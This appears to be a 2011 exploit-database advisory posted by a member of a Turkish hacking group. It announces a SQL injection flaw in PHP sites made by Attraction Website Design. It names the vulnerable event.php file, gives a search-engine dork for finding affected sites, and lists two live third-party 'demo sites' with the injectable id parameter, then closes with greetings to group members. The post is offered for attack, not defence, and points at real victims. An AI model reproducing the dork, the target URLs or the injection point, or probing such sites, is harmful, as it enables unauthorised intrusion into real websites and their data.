# Exploit Title: Attraction Website Design Sql Injection Vulnerability # Date: 30/10/2011 - 22:45 # Author: 3spi0n # Software Website: http://www.attractweb.com/index.php # Tested On: BackTrack 5 - Win7 Ultimate # Platform: Php >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> [$] Vulnerable File: Event.php and other .php files. [$] Dorks: "Site by Attraction Website Design" [$] Demo Sites: [~] http://www.runningmyraces.com/event.php?id=1870" [PhpSQLi] [~] http://www.livingthegoodnews.runningmyraces.com/event.php?id=3344" [PhpSQLi] >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> # We attempted to work, you can not imagine. >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> # Contact: Http://3spi0n.Net/ # Greetz: Http://DarkDevilz.in/ >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Mr.PaPaRoSSe Black_Umo ALEXTRAX Brs_BaRoN ZyX x-Leader Legend Coder DARKCOD3R Santiq0 53rh4t PerS ExDeaTH [And DD'z Family] [DarkDevilz - Defence And Destruction Group'z - TURKEY] >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>